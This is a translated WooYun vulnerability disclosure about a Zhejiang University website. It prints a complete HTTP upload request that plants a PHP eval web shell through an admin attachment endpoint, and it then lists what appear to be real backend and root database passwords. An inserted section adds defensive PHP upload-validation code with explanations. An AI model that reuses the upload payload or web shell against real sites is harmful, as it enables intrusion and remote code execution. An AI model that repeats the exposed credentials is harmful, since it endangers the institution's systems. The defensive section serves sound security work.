Vulnerability summary

Defect ID: wooyun-2016-0167065

Title: A Zhejiang University site has multiple vulnerabilities; database account and password among other data exposed, GETSHELL obtained

Vendor: Zhejiang University

Author: 八神

Submitted: 2016-01-05 23:37

Fixed: 2016-02-12 18:49

Published: 2016-02-12 18:49

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CCERT, the CERNET emergency response group) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-05: Details sent to the vendor, awaiting vendor handling
2016-01-06: Vendor confirmed; details disclosed to the vendor only
2016-01-16: Details disclosed to core white hats and domain experts
2016-01-26: Details disclosed to regular white hats
2016-02-05: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public

Brief description:

Sigh, Lao Wang next door stole my iPhone.

Detailed description:

[Screenshots: 01.png, 1.png, 2.png, 3.png, 4.png, 5.png]


Proof of vulnerability:

POST /admin.php?c=attachments&a=swfupload&dosubmit=1 HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
User-Agent: Shockwave Flash
Host: **.**.**.**
Content-Length: 1899
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: SpLangCookies=cn; _gscu_742156466=51819580yd5f5234; _gscs_742156466=51819580co97jm34|pv:1; PHPSESSID=540bb846e41d5c77a474d6c573169d44; zjuoluserid=Qg%3D%3D; zjuoladmin_email=HgscFxQ6EAAMD1QPERpCGQQ%3D; zjuoladmin_username=HgscFxQ%3D; zjuolatt_json=AUgUBghYUEdcWkhcRVxAWBkHDE5ASB0bGApQKUAwVR0CGEIAHxYMQh8OAEEPFDZaGhwWBRQLChMGEDNDSFpEWTBVWkRfWCZFR19dTFpEX1hKWERZWE1fQVZCEBoSTUBYDBwDCRQLGApOQEgBCgECRAUwBhdEFBwcX1k3QQYKDVcSEAYRVw4FHkhPWlVJXU1aWVZIBh0PWFBXBxgOGk8zQyZFAhgbVBAADA9UDxEaQhkEKUAZCgYaDggcAxkKMFVYRV5aJkVFXlxONlpdXEtcRV5cTlpHXVtIW0dbWFQABQhOVkgTBgAfBBQCCVhQVxdCEBoSTRE%3D
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="Filename"
a.cer
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="filetype_post"
aspx|aspx|asp|php5|docx|xls|xlsx|ppt|pptx|pdf|txt|rar|zip|swf
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="swf_auth_key"
429a371c17329d0af5c61ae3abead687
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="thumb_width"
0
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="dosubmit"
1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="thumb_height"
0
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="isadmin"
1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="watermark_enable"
1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="userid"
1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="groupid"
8
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="SWFUPLOADSESSID"
1451845655
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="catid"
10
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="siteid"
1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="module"
content
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="Filedata"; filename="a.PHP5"
Content-Type: application/octet-stream
<?php @eval($_POST['tom']);?>
GIF89a
<?php @eval($_POST['tom']);?>
<?php @eval($_POST[tom])?>
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="Upload"
a
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1--


Backend account: daixx
pass: amanda3020397
--------------------------------------
host => localhost
login => root
pass => zucc@xcb#2012    (root database password)
database=> zucc
prefix =>
---------------------------------------
Sigh, Lao Wang next door stole my iPhone.
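The captured request above shows two things a defender should take away: the list of permitted extensions (`filetype_post`) is supplied by the client and includes `php5`, and the uploaded name uses an upper-case `.PHP5` with a file whose bytes mix PHP open tags and a `GIF89a` header. The following is an added illustration of a server-side upload check that closes those gaps; it is not code from the affected site, from the CMS behind `admin.php`, or from the report's author. The function names (`validate_upload`, `stored_name`), the allowlist and blocklist values, and the magic-byte table are assumptions chosen for this example, and it assumes PHP 7.1 or later.

```php
<?php
// Added example: server-side upload validation that never trusts a client-supplied
// extension list. All names and lists below are assumptions for illustration.

// Server-side allowlist. The client's "filetype_post" value is never consulted.
const UPLOAD_ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'docx', 'xlsx', 'pptx', 'zip'];

// Extensions that must never be stored under the web root, whatever the allowlist says.
const UPLOAD_BLOCKED_EXT = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar',
                            'asp', 'aspx', 'jsp', 'cer', 'htaccess'];

// Expected leading bytes for the types we accept (magic-number check).
const UPLOAD_MAGIC = [
    'jpg'  => "\xFF\xD8\xFF",
    'jpeg' => "\xFF\xD8\xFF",
    'png'  => "\x89PNG",
    'gif'  => "GIF8",
    'pdf'  => "%PDF",
    'zip'  => "PK\x03\x04",
    'docx' => "PK\x03\x04",
    'xlsx' => "PK\x03\x04",
    'pptx' => "PK\x03\x04",
];

/**
 * Decide whether an uploaded file may be stored. Returns null when the file is
 * acceptable, otherwise a short reason string suitable for logging.
 *
 * $filename is the client-supplied name; $contents is the raw file body.
 */
function validate_upload(string $filename, string $contents): ?string
{
    // Lower-case the name so "a.PHP5" is treated exactly like "a.php5".
    $lower = strtolower(basename($filename));
    $parts = explode('.', $lower);
    if (count($parts) < 2) {
        return 'missing extension';
    }
    // Every extension segment is checked, so "shell.php5.jpg" is rejected too.
    $exts = array_slice($parts, 1);
    foreach ($exts as $ext) {
        if (in_array($ext, UPLOAD_BLOCKED_EXT, true)) {
            return "blocked extension .$ext";
        }
    }
    $ext = end($exts);
    if (!in_array($ext, UPLOAD_ALLOWED_EXT, true)) {
        return "extension .$ext not in allowlist";
    }
    // The body must start with the magic bytes of the claimed type; a file that
    // begins with "<?php" fails here even if "GIF89a" appears later.
    if (isset(UPLOAD_MAGIC[$ext])
        && strncmp($contents, UPLOAD_MAGIC[$ext], strlen(UPLOAD_MAGIC[$ext])) !== 0) {
        return 'content does not match claimed type';
    }
    // Reject any body carrying PHP open tags, which also catches "GIF89a<?php ..."
    // polyglots whose magic bytes are correct.
    if (stripos($contents, '<?php') !== false || strpos($contents, '<?=') !== false) {
        return 'embedded script content';
    }
    return null;
}

/** Store an accepted file under a server-generated name, never the client's. */
function stored_name(string $filename): string
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs mirroring the shapes seen in the captured request.
$samples = [
    ['a.PHP5',    "<?php @eval(\$_POST['tom']);?>\nGIF89a\n"],
    ['cat.gif',   "GIF89a<?php @eval(\$_POST['tom']);?>"],
    ['cat.gif',   "GIF89a\x01\x00\x01\x00"],
    ['x.php.jpg', "\xFF\xD8\xFF\xE0"],
];
foreach ($samples as [$name, $bytes]) {
    $reason = validate_upload($name, $bytes);
    echo str_pad($name, 10), ' => ', $reason ?? ('accepted as ' . stored_name($name)), "\n";
}
```

Running the script rejects the first sample on its blocked `.php5` extension, the second on the embedded `<?php` tag, and the fourth on the inner `.php` segment; only the plain GIF is accepted, and it is saved under a random name. The content scan is deliberately strict and will also refuse a legitimate document that happens to contain the string `<?php`; in practice this check belongs alongside, not instead of, storing uploads in a directory where the web server does not execute scripts.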

Fix recommendation:

Sigh, Lao Wang next door stole my iPhone. When will my Rank be enough to trade for one?

Copyright notice: when reposting, credit the source: 八神@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2016-01-06 07:59

Vendor reply:

Notified, handling in progress

Latest status:

None